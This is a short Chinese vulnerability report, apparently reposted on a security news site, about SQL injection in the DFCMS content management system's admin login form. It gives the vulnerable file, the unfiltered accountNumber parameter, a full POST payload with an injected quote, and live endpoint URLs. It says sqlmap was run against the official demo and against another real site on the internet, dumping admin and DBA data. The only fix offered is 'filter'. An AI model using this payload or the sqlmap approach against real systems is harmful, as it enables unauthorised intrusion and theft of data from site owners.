频道栏目
首页 > 资讯 > 网站安全 > 正文

DFCMS系统通用性注入(demo演示)

14-12-06        来源:[db:作者]  
收藏   我要投稿

 

程序: DFCMS


漏洞文件:acAdmin/acAdminLogin.jsp

accountNumber= 参数没有过滤。(也就是编号对应的地方)

post:isEncrypt=0&loginFailPage=acAdminLogin.jsp&accountNumber=1%27&loginName=admin&loginPwd=test&mianlogin=on&imgLogin.x=66&imgLogin.y=16



官方demo演示:

http://www.dfcms.net/acAdmin/acAdminLogin.jsp

编号处输入1’
 

wooyun.png






 

wooyun.png





报错:
 

wooyun.png




 

 

sqlmap跑下

注射点:

http://www.dfcms.net/acAdmin/acAdmin.do?method=login

post:isEncrypt=0&loginFailPage=acAdminLogin.jsp&accountNumber=1%27&loginName=admin&loginPwd=test&mianlogin=on&imgLogin.x=97&imgLogin.y=25


 

wooyun.png





admin数据:
 

wooyun.png





网上的另外一个站点也跑出数据(dba)
 

wooyun.png



 

修复方案:

过滤~
 

相关TAG标签
上一篇:Haproxy+mysqlcluster(MySQL集群)配置
下一篇:易飞ERP客户问题集合之一
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站